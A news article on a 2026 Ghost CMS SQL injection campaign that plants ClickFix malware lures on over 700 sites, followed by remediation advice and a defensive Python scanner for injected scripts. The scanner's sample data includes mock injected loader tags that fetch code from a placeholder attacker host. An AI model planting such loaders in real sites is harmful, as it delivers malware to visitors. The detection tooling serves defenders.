
Ghost CMS SQL Injection Flaw Hits 700+ Sites in ClickFix Attack

Huma Shazia, 24 May 2026 at 8:22 pm, 5 min read

Key Takeaways

Source: BleepingComputer
  • Over 700 domains compromised, including Harvard, Oxford, and DuckDuckGo
  • Attackers steal admin API keys via SQLi, then inject malicious JavaScript into articles
  • Ghost CMS 6.19.1 fixes the flaw, but many sites remain unpatched three months later

What's Happening

A large-scale attack campaign is exploiting a critical SQL injection vulnerability in Ghost CMS to compromise legitimate websites and turn them into malware distribution platforms. Security researchers at XLab, the threat intelligence arm of Chinese cybersecurity firm Qianxin, have confirmed the attack has hit more than 700 domains.

The victims include university portals, AI and SaaS companies, media outlets, fintech firms, security websites, and personal blogs. Harvard University, Oxford University, Auburn University, and privacy-focused search engine DuckDuckGo are among the confirmed targets.


The vulnerability, tracked as CVE-2026-26980, carries a CVSS severity score of 9.4 out of 10. It affects Ghost versions 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from a website's database, including admin API keys.

[Figure: A sample of the compromised sites identified by XLab researchers]

How the Attack Works

The attack unfolds in two distinct stages. First, attackers exploit the SQL injection flaw to extract admin API keys from the Ghost database. These keys grant full management access to users, articles, and themes.

With admin privileges secured, attackers inject malicious JavaScript into existing articles. The script acts as a lightweight loader that fetches second-stage code from attacker-controlled infrastructure. This code fingerprints visitors to identify high-value targets.

Visitors who pass the verification check see a fake Cloudflare prompt loaded via an iframe on top of the article page. This is the ClickFix lure. The page instructs victims to verify they're human by pasting a provided command into their Windows command prompt. That command downloads malware to their system.

[Figure: The fake Cloudflare verification prompt used in the ClickFix attack]

XLab observed multiple payloads in use: DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.

Why ClickFix Is Effective

The ClickFix technique bypasses traditional browser-based sandbox protections by tricking users into manually executing malicious shell commands. Unlike drive-by downloads or browser exploits, this approach relies on social engineering. The victim does the attacker's work for them.

Discussions on Reddit's r/cybersecurity community highlight growing concern about this trend. Users note that clipboard-hijacking techniques are becoming harder for non-technical people to detect. When a trusted website tells you to paste something into your terminal, many people comply without questioning it.

The simplicity of the attack is its deadliest feature; by exploiting a single injection point, they effectively turn the host platform against its own audience.

— Senior Security Analyst, Independent Threat Intelligence Firm

Multiple Threat Actors Involved

XLab researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites. In some cases, one group would clean up another's malicious script only to inject their own. Some domains were re-infected multiple times with different payloads after cleanup attempts.

[Figure: Timeline showing multiple waves of attacks targeting Ghost CMS sites]

This pattern suggests the vulnerability is being actively shared or sold in underground markets. When multiple threat actors compete to compromise the same targets, it indicates a vulnerability with proven value.

The Patch Gap Problem

Ghost released a fix for CVE-2026-26980 on February 19, 2026, in version 6.19.1. SentinelOne published detection guidance on February 27. Yet more than three months later, hundreds of sites remain vulnerable.

This gap between patch availability and patch adoption is a persistent problem in web security. Ghost CMS is popular with independent publishers, academic institutions, and small teams who may lack dedicated security staff. Automatic updates aren't always enabled, and security advisories don't always reach the right people.

February 19, 2026: Ghost CMS releases version 6.19.1 with the security fix
February 27, 2026: SentinelOne publishes exploitation details and detection guidance
May 24, 2026: XLab confirms 700+ domains compromised in the ongoing campaign

What Ghost CMS Administrators Should Do Now

If you run a Ghost CMS site, act now: upgrade to version 6.19.1 or later. But patching alone isn't enough, because keys stolen and scripts injected before the update survive it.

  1. Update Ghost CMS to version 6.19.1 or newer immediately
  2. Rotate all admin API keys, as they may have been stolen before you patched
  3. Review all published articles for injected JavaScript, especially in page headers and footers
  4. Check XLab's published indicators of compromise against your site's code
  5. Enable admin API call logging and maintain at least 30 days of records for forensic analysis

XLab has released a list of indicators of compromise, including specific injected script signatures. A thorough code review is necessary to locate and remove any malicious additions.
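Steps 1 and 3 of the checklist above (confirm the version, then review every article for injected JavaScript) can be done offline against a Ghost JSON content export. The script below is an added example, not code from the article, XLab, or the Ghost project. It assumes the export has the shape `{"db": [{"meta": {"version": ...}, "data": {"posts": [...], "settings": [...]}}]}` with per-post fields `html`, `codeinjection_head` and `codeinjection_foot` (adjust the names if your export differs); the allowlist of embed hosts, the sample export and the attacker hostname are all constructed placeholders. It reports every `<script>`/`<iframe>` that points outside the allowlist and every inline script, and flags an exported version inside the affected range stated in the article.

```python
"""Offline scan of a Ghost content export for injected scripts and iframes."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Affected range and fixed release as stated in the article (CVE-2026-26980).
FIRST_AFFECTED = (3, 24, 0)
FIXED_VERSION = (6, 19, 1)

# Constructed allowlist of hosts this site knowingly embeds; everything
# else (including relative same-origin references) is reported for review.
ALLOWED_HOSTS = {"www.youtube.com", "platform.twitter.com"}


def parse_version(text):
    """'6.19.1-beta' -> (6, 19, 1); missing components count as 0."""
    nums = []
    for part in text.split("."):
        digits = ""
        for ch in part:
            if not ch.isdigit():
                break
            digits += ch
        nums.append(int(digits) if digits else 0)
    return tuple((nums + [0, 0, 0])[:3])


def is_vulnerable_version(text):
    """True when the exported version lies in 3.24.0 <= v < 6.19.1."""
    return FIRST_AFFECTED <= parse_version(text) < FIXED_VERSION


class _RefCollector(HTMLParser):
    """Collects <script src>/<iframe src> targets and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.refs = []     # (tag, src)
        self.inline = []   # bodies of <script> tags without src
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.refs.append(("script", a["src"]))
            else:
                self._in_inline_script = True
        elif tag == "iframe" and a.get("src"):
            self.refs.append(("iframe", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script and data.strip():
            self.inline.append(data.strip())


def scan_fragment(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, detail) findings for one HTML fragment (None/empty -> [])."""
    if not html:
        return []
    collector = _RefCollector()
    collector.feed(html)
    findings = []
    for tag, src in collector.refs:
        host = (urlparse(src).hostname or "").lower()
        if host not in allowed_hosts:
            findings.append((f"external-{tag}", src))
    for body in collector.inline:
        findings.append(("inline-script", body[:80]))
    return findings


def scan_export(export):
    """Scan post bodies, per-post code injection and site-wide code injection."""
    db = export["db"][0]
    version = db.get("meta", {}).get("version", "0.0.0")
    report = {"version": version,
              "vulnerable_version": is_vulnerable_version(version),
              "findings": []}
    for post in db["data"].get("posts", []):
        for field in ("html", "codeinjection_head", "codeinjection_foot"):
            for kind, detail in scan_fragment(post.get(field)):
                report["findings"].append({"post": post.get("slug"), "field": field,
                                           "kind": kind, "detail": detail})
    # Site-wide header/footer injection is stored as key/value settings rows.
    for row in db["data"].get("settings", []):
        if row.get("key") in ("codeinjection_head", "codeinjection_foot"):
            for kind, detail in scan_fragment(row.get("value")):
                report["findings"].append({"post": None, "field": "settings." + row["key"],
                                           "kind": kind, "detail": detail})
    return report


# Constructed sample export: a clean post with a known embed, a post whose body
# carries an injected loader, and a site-wide footer injection. The attacker
# hostname is a placeholder, not a real indicator of compromise.
SAMPLE_EXPORT = {"db": [{
    "meta": {"version": "6.18.2"},
    "data": {
        "posts": [
            {"slug": "welcome",
             "html": '<p>Hello</p><iframe src="https://www.youtube.com/embed/abc"></iframe>',
             "codeinjection_head": None, "codeinjection_foot": None},
            {"slug": "quarterly-update",
             "html": '<p>News</p><script src="https://cdn.attacker-placeholder.invalid/l.js"></script>',
             "codeinjection_head": None, "codeinjection_foot": None},
        ],
        "settings": [
            {"key": "title", "value": "Example Blog"},
            {"key": "codeinjection_foot",
             "value": '<script>var s=document.createElement("script");'
                      's.src="https://cdn.attacker-placeholder.invalid/f.js";'
                      'document.body.appendChild(s);</script>'},
        ],
    },
}]}


if __name__ == "__main__":
    result = scan_export(SAMPLE_EXPORT)
    print(f"Ghost {result['version']}: vulnerable version = {result['vulnerable_version']}")
    for f in result["findings"]:
        print(f"  {f['kind']:16} {f['post'] or '-':18} {f['field']:28} {f['detail']}")
```

Run it against a real export (Ghost admin, Settings, Export content) by loading the JSON file into `scan_export`. Every finding is a candidate for manual review rather than proof of compromise: a theme may legitimately use inline scripts, so the allowlist and the inline-script rule should be tuned to what your site is known to contain, and anything left over compared against XLab's published indicators.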

[Figure: The multi-phase attack chain from SQLi to malware delivery]

Broader Implications

Ghost CMS is an open-source publishing platform used by academic institutions, media outlets, and independent bloggers. Its user base skews toward organizations that prioritize content over infrastructure management.

This campaign demonstrates how attackers can weaponize trusted platforms. A reader visiting Harvard's blog or DuckDuckGo's content has no reason to suspect the site itself is compromised. That trust becomes the attack vector.


Frequently Asked Questions

What is CVE-2026-26980?

It's a critical SQL injection vulnerability in Ghost CMS versions 3.24.0 through 6.19.0 that allows unauthenticated attackers to extract sensitive data from the website database, including admin API keys.

How do I know if my Ghost site was compromised?

Check your published articles for unfamiliar JavaScript code, especially in headers and footers. Review XLab's published indicators of compromise and examine your admin API call logs for suspicious activity.

What is a ClickFix attack?

ClickFix is a social engineering technique where attackers display fake verification prompts that trick users into pasting malicious commands into their system terminal, bypassing browser security protections.

Is Ghost CMS still safe to use?

Yes, but only if you're running version 6.19.1 or later. The vulnerability has been patched. The ongoing attacks target sites that haven't applied the update.

Why are universities being targeted?

University websites have high domain authority and visitor trust. Compromising them gives attackers access to a large, educated audience who may be more likely to follow technical-looking instructions.


Huma Shazia

Senior AI & Tech Writer
